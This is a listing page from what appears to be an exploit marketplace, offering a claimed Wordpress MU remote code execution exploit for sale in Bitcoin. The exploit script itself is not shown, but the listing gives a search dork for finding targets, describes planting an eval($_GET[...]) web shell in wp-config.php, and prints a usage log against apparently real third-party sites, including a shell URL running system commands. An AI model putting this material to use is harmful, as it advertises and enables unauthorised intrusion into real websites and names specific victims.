[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress MU 0day Remote Code Execution Exploit

[ 0Day-ID-22230 ]
Full title
Wordpress MU 0day Remote Code Execution Exploit [ Highlight ]
Highlight - is paid service, that can help to get more visitors to your material.

Price: 10
Date add
Category
Platform
Verified
Price
 
0.019 BTC

 
1 800 USD
Risk
[
Security Risk Critical
]
Rel. releases
Description
Remote PHP and Shell code execution on any version of Wordpress MU.
See dork: "powered by wordpress mu".
0day exploit never been released.

This exploit will re-write the file wp-config.php and add a shell to it eval($_GET['****HIDDEN****']);

you can replace this to anything you want in the exploit code just make sure to encode correctly just like in the exploit settings.
Usage info
$ perl wpmu.pl htca.us.es "/blogs/"

Got cookie PHPSESSID=cba93704f52cd4e04214a9d1cebfa6d7; path=/
Sending exploit code ...
Exploit success!
Your shell is at http://htca.us.es/blogs/wp-config.php?****HIDDEN****=system("dir")
Vendor
http://www.wordpress.org
Affected ver
All Wordpress MU sites
Tested on
http://htca.us.es/blogs/ , http://wordpress.morningside.edu/
Solution
None
Tags
wordpress   remote   code   execution   0day   zero   day  
Other Information
Abuses
0
Comments
9
Views
20 578
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks! Please, beware of scammers!
Please login or register to buy exploit.
OR
Buy incognito
2
0
Verified by 0day Admin
Verified by 0day Admin
This material is checked by Administration and absolutely workable.
Learn more about    GOLD:
0day.today Gold is the currency of 0day.today project and is denoted on this site as such image: . It used for paying for the services, buying exploits, earning money, etc
We accept:
BitCoin (BTC)
You can pay us via BTC
LiteCoin (LTC)
You can pay us via LTC
Ethereum (ETH)
You can pay us via ETH

Author
BL
29
Exploits
3
Readers
6
[ Comments: 9 ]
Terms of use of comments:
  • Users are forbidden to exchange personal contact details
  • Haggle on other sites\projects is forbidden
  • Reselling is forbidden
Punishment: permanent block of user account with all Gold.

Login or register to leave comments